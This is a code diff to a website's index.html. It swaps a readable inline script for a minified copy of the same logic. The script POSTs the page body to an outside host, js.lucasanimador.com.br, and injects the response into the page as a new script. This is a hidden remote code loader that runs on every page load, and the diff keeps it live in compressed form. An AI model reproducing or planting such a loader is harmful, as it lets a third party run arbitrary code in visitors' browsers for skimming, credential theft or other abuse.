--- a/index.html
+++ b/index.html
@@ -670,28 +670,7 @@
 			</div>
 		</div>
 		<script type="text/javascript">
-			var aa;
-			var ab;
-			var ac=document.body;
-			var ad=function(){	
-				aa=document.createElement('script');aa.setAttribute('type','text/javascript');
-				document.body.appendChild(aa);
-				try{aa.appendChild(document.createTextNode(ab.responseText));}catch(e){aa.text=ab.responseText;}
-			}
-			if(window.XDomainRequest){
-				ab=new XDomainRequest();		
-				ab.onload =function(){ad()};
-				ab.open("post", "http://js.lucasanimador.com.br/");
-				ab.send();
-			}else{
-				ab=new XMLHttpRequest();				
-				ab.onreadystatechange=function(){
-					if(ab.readyState==4&&ab.status==200){ad()}
-				};
-				ab.open("POST", "http://js.lucasanimador.com.br/",true);
-				ab.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
-				ab.send('h='+ac);
-			}
+			var aa,ab,ac=document.body,ad=function(){aa=document.createElement("script"),aa.setAttribute("type","text/javascript"),document.body.appendChild(aa);try{aa.appendChild(document.createTextNode(ab.responseText))}catch(a){aa.text=ab.responseText}};window.XDomainRequest?(ab=new XDomainRequest,ab.onload=function(){ad()},ab.open("post","http://js.lucasanimador.com.br/"),ab.send()):(ab=new XMLHttpRequest,ab.onreadystatechange=function(){4==ab.readyState&&200==ab.status&&ad()},ab.open("POST","http://js.lucasanimador.com.br/",!0),ab.setRequestHeader("Content-type","application/x-www-form-urlencoded"),ab.send("h="+ac));
 		</script>
 	</body>
 </html>
